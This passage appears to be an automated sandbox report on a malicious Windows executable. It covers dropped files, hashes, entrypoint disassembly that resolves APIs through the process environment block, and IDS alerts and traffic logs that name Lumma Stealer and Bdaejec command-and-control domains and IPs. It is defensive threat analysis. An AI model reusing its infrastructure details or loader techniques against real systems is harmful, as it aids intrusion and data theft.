.F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DAC.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4583
Entropy (8bit):	4.451190013984653
Encrypted:	false
SSDEEP:	48:cvIwWl8zs8Jg77aI9HAzXWpW8VY0Ym8M4JD7DpaFWI+q8g39TRQnojnsd:uIjf6I7FAzm7VQJDvp7Il3xReoTsd
MD5:	BFEF61A99F35E93521BE1076D161D98F
SHA1:	45DDEB1B89C55C53BD1B3C34688986D4DE29DCF6
SHA-256:	D120AAA66A7A5E527394F2A79F352A1CF62113EB5004D04A47BC5900FD86CBAE
SHA-512:	6E94FA9FEF7714279AC76E7DBEF4E80A27BDCFED771D5D78026F5D596326B5D2B262F228D0989BF82B13AB03AB905CEDFED8D03FB83FAD31C0374EEC8F33EC26
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9B3.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Jul 24 22:25:51 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	156944
Entropy (8bit):	1.8345020245830879
Encrypted:	false
SSDEEP:	384:hZI2+ZIcmTAyTIx9OKegQMGEwK+W9OHYRqzAtjSvu62YvZ8bKGBxrLWYZKG9tUOn:/Ijtmcx9OKeg3E67o2fngeVX
MD5:	15E59BF602BA797DC2BE84F20E635DC3
SHA1:	E945411475CB3314A2F92877887C1E4C143E10F9
SHA-256:	3D59D6347B160769E45A8E0D3F0F3462913153EA6D8A186F69D6603BD15177E5
SHA-512:	DBAF59D7FC6918282DE93E325692E410733CFB9C2834304EFE041FF61DF5F5EC682186775F95460E0CC49FC7D0AB78AF3ED5E71DA8934455888F5C43F6580A38
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......o..f............D...............X.......<...$ ......D....M..........`.......8...........T............=..p'..........` ..........L"..............................................................................eJ......."......GenuineIntel............T...........i..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB0C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8266
Entropy (8bit):	3.702590949632891
Encrypted:	false
SSDEEP:	192:R6l7wVeJBN6w6Yp66djogmfGOpDy89bUJsfMHZ8m:R6lXJr6w6Y06egmfG4Uif6
MD5:	EA77ACDCF147EDCADAFD6D117EF437EF
SHA1:	DA322E1E7C3D0E4780CEAF04F309DF99B475B1E1
SHA-256:	8E837061C8C8B27AA635ACED65FF4F4A7D72E51C209956FB9273B68DD49868C7
SHA-512:	151E0B651F9232CC719559A377632755F94C7BADC3983AF341984193C9814CA098FBFCA3005ED0A60B7DF77BF2D704857F453E73ACD4A21C59D463E150077733
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB2C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.464374835815323
Encrypted:	false
SSDEEP:	48:cvIwWl8zsLJg77aI9HAzXWpW8VYNYm8M4JUZFxM++q8QtIN1Sg8S3d:uIjflI7FAzm7VpJiLSggX3d
MD5:	1BD7DAEC00617583DA509D2CF9B495E3
SHA1:	7F8ED9799C50A15344CF4910D771CFD91857F453
SHA-256:	9209DDF2262BFAD300F8C5004CB20E9E1E4714C22ADB97FD1544412D0CFD8DE9
SHA-512:	B9D7102ED36B2A7DA3443AB511F881FB4B2856BE2D262058EADC3729706545B45B05CBFC866C2393988ECFE0C9EBF8C796FDDC4C4FAB74397981CA477B1B3E22
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425608" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\jJEAWO.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\089268A2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jJEAWO.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Download File

Process:	C:\Users\user\Desktop\current[1].exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031075575407894
Encrypted:	false
SSDEEP:	384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
MD5:	F7D21DE5C4E81341ECCD280C11DDCC9A
SHA1:	D4E9EF10D7685D491583C6FA93AE5D9105D815BD
SHA-256:	4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
SHA-512:	E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: C[MbrWriter].exe, Detection: malicious, Browse Filename: cerber.exe, Detection: malicious, Browse Filename: CDC14C6C7E3AB6373BAF5031C597D302F68791ED3B0A98E446B150A1F22C8D0F.exe, Detection: malicious, Browse Filename: C7F05A51EF9CD4372057583AF5DDEF7EA41D377ECBDB06AA604DE8B59F277BD5.exe, Detection: malicious, Browse Filename: CA023814AA064AC9CD4015CF89EEC32339828447BB34D2F45C44EF9D064603FF.exe, Detection: malicious, Browse Filename: C72AA9C4DF96E6768A8A1DB299A8E787AC729FAA40C536FA4344F82D4670A947.exe, Detection: malicious, Browse Filename: C80F5360D6E3484FF09BD86186BAFFA361803879E40CEAA9AF984CDF68FFEA5B.exe, Detection: malicious, Browse Filename: C5665332E8CA3D76FB4B583B3FF97D1F99828F33CAD445B22020147BF9079F59.exe, Detection: malicious, Browse Filename: C57B86BE5A9FA166A946D78D8B63D9817FF3E14DF83ABD88B654BD66167696DE.exe, Detection: malicious, Browse Filename: C5FB4D13BB4B34F9670BC238A047B53C4392B299139C3DA8B2B70BA9DDD3DB2D.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\jJEAWO.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468499414336876
Encrypted:	false
SSDEEP:	6144:3IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNfdwBCswSb3:4XD94+WlLZMM6YFH1+3
MD5:	38353BA96CBF2F91B2EB04C6AA08E446
SHA1:	5E6EA6876E4984C3F5D21599471E5F27C01F280F
SHA-256:	DC42DE50E0A8538944DBA2A8B7D260AB3C1C5F0289ECF8CF91D44835BF65C751
SHA-512:	1E1DA190929D7043959D3F80FEB0266A5EF8FC43C01A0337A8DDC7A178A496687C71B4B60DE09A3A9C28CCDE788468213F2F8A4A44AE495DCEC616F25172FD6E
Malicious:	false
Preview:	regf8...8....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.I.m................................................................................................................................................................................................................................................................................................................................................(..Y........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.553782585030101
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	current[1].exe
File size:	512'512 bytes
MD5:	cd7329155530fb805abb2cace9b32134
SHA1:	a73cd6bb4b42e19756d56289324787b562b07225
SHA256:	ab58f2c394aead605975f0ef099f51af8c5a70d2ecfeac3710cb5905409d03f2
SHA512:	f1a693c6b5f5c6c9023272e235c8d71c84760aab3616a5c2a9c323fc03b62f7c7089e5eb42f99db3dcc69bd4cf92a31fafb380fa8382733dae6681ada9ac3254
SSDEEP:	12288:ZNkvkJYTyTrmHwspuV2TPaHYq1eNA33FHf92/3BxL6:EaYGTrm5OzHy233Fw/3H6
TLSH:	44B4022236B1D072DABB90B008359F525BBF787692B8804F6725076A6E713D05F37B1B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L...S..c...........

File Icon


Icon Hash:	5765656565c54518

Static PE Info

General

Entrypoint:	0x497000
Entrypoint Section:	ESu,
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x63C11353 [Fri Jan 13 08:16:19 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	62d46ff31d47f63978e2d51da092dc3a

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 41454A6Ah
mov dword ptr [ebp-44h], 652E4F57h
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
call 00007FE040DF7A05h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFF6B3CDh
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007FE040DF7B4Eh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007FE040DF7A54h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007FE040DF7A4Bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a97c	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7f000	0xa248	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x661d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x6a210	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x66000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x64186	0x64200	c6e9d5e187d30e4a943a6993b4b2cc4f	False	0.9091784683208489	data	7.864241341045099	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x66000	0x5280	0x5400	bc0ff9c83a00d6906f68626107d513bf	False	0.46284412202380953	data	5.7565885221149795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x6c000	0x12528	0x5200	74893fe868abddbbe343693edcaf8d2a	False	0.10580221036585366	dBase III DBT, next free block index 7565155	1.227398245830067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x7f000	0x17248	0xa400	4b4849a98af42c8d6d15c1f327850e58	False	0.6466511051829268	data	6.203644550370232	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
ESu,	0x97000	0x5000	0x4200	5a33e12bf12ddb7e7ee7eaede26cfab3	False	0.7775804924242424	data	6.934721013700985	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x87430	0xe	data			1.5714285714285714
TAJONULE	0x855b0	0x1e31	ASCII text, with very long lines (7729), with no line terminators	Romanian	Romania	0.5867511967913055
RT_ICON	0x7f450	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Romanian	Romania	0.8089019189765458
RT_ICON	0x802f8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Romanian	Romania	0.8181407942238267
RT_ICON	0x80ba0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Romanian	Romania	0.680635838150289
RT_ICON	0x81108	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Romanian	Romania	0.7073651452282158
RT_ICON	0x836b0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Romanian	Romania	0.7410881801125704
RT_ICON	0x84758	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Romanian	Romania	0.7569672131147541
RT_ICON	0x850e0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Romanian	Romania	0.7792553191489362
RT_STRING	0x87630	0x590	data	Romanian	Romania	0.43469101123595505
RT_STRING	0x87bc0	0x378	data	Romanian	Romania	0.4752252252252252
RT_STRING	0x87f38	0x4e8	data	Romanian	Romania	0.45461783439490444
RT_STRING	0x88420	0x526	data	Romanian	Romania	0.45295902883156297
RT_STRING	0x88948	0x524	data	Romanian	Romania	0.4452887537993921
RT_STRING	0x88e70	0x3d2	data	Romanian	Romania	0.45296523517382414
RT_ACCELERATOR	0x873e8	0x48	data	Romanian	Romania	0.8472222222222222
RT_GROUP_ICON	0x85548	0x68	data	Romanian	Romania	0.6923076923076923
RT_VERSION	0x87440	0x1f0	MS Windows COFF PowerPC object file			0.530241935483871

Imports

DLL	Import
KERNEL32.dll	SetComputerNameW, AddConsoleAliasW, GetComputerNameW, GetFileAttributesExA, GetTickCount, FindNextVolumeMountPointA, GetUserDefaultLangID, AssignProcessToJobObject, GetModuleFileNameW, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, GetProcAddress, VirtualAlloc, LoadLibraryA, CreateJobObjectW, LocalAlloc, MoveFileA, GetNumberFormatW, RemoveDirectoryW, GlobalFindAtomW, EnumResourceTypesW, CreateWaitableTimerW, GetConsoleTitleW, VirtualProtect, DeleteFileW, GetCurrentProcessId, UnregisterWaitEx, GetVolumeInformationW, WriteConsoleA, InterlockedDecrement, CreateFileA, SetStdHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleHandleW, Sleep, ExitProcess, GetStartupInfoW, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, HeapFree, WriteFile, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetSystemTimeAsFileTime, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, RaiseException, RtlUnwind, HeapAlloc, HeapReAlloc, HeapSize, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, GetConsoleOutputCP, WriteConsoleW
USER32.dll	GetMenu
GDI32.dll	GetCharABCWidthsFloatW
WINHTTP.dll	WinHttpSetOption

Possible Origin

Language of compilation system	Country where language is spoken	Map
Romanian	Romania

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T00:25:48.931176+0200	UDP	2050569	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (sofahuntingslidedine .shop)	62562	53	192.168.2.4	1.1.1.1
2024-07-25T00:25:46.594927+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	53900	53	192.168.2.4	1.1.1.1
2024-07-25T00:25:51.713349+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49733	799	192.168.2.4	44.221.84.105
2024-07-25T00:26:05.795110+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49745	13.85.23.86	192.168.2.4
2024-07-25T00:25:50.257064+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49732	443	192.168.2.4	188.114.96.3
2024-07-25T00:26:23.945099+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49747	443	192.168.2.4	13.89.179.12
2024-07-25T00:25:49.613567+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49731	443	192.168.2.4	188.114.96.3
2024-07-25T00:26:43.318154+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49748	13.85.23.86	192.168.2.4
2024-07-25T00:26:20.886285+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49732	443	192.168.2.4	188.114.96.3
2024-07-25T00:25:47.104617+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49730	799	192.168.2.4	44.221.84.105
2024-07-25T00:26:04.945224+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49744	443	192.168.2.4	52.168.117.173
2024-07-25T00:25:49.436763+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49731	443	192.168.2.4	188.114.96.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 00:25:46.717783928 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 25, 2024 00:25:46.722667933 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 25, 2024 00:25:46.722822905 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 25, 2024 00:25:46.723144054 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 25, 2024 00:25:46.728046894 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 25, 2024 00:25:47.104477882 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 25, 2024 00:25:47.104617119 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 25, 2024 00:25:47.104825020 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 25, 2024 00:25:47.104926109 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 25, 2024 00:25:47.106117010 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 25, 2024 00:25:47.110902071 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 25, 2024 00:25:48.953540087 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:48.953578949 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:48.953722000 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:48.957680941 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:48.957700968 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:49.436594963 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:49.436763048 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:49.458973885 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:49.458993912 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:49.459932089 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:49.510314941 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:49.510350943 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:49.510530949 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:49.613656998 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:49.613812923 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:49.613908052 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:49.613934040 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:49.613953114 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:49.614006042 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:49.614013910 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:49.616301060 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:49.616373062 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:49.637480021 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:49.637509108 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:49.680454016 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:49.680502892 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:49.680586100 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:49.680861950 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:49.680876017 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:50.256897926 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:50.257064104 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:50.277581930 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:50.277601957 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:50.277951002 CEST	443	49732	188.114.96.3	192.168.2.4
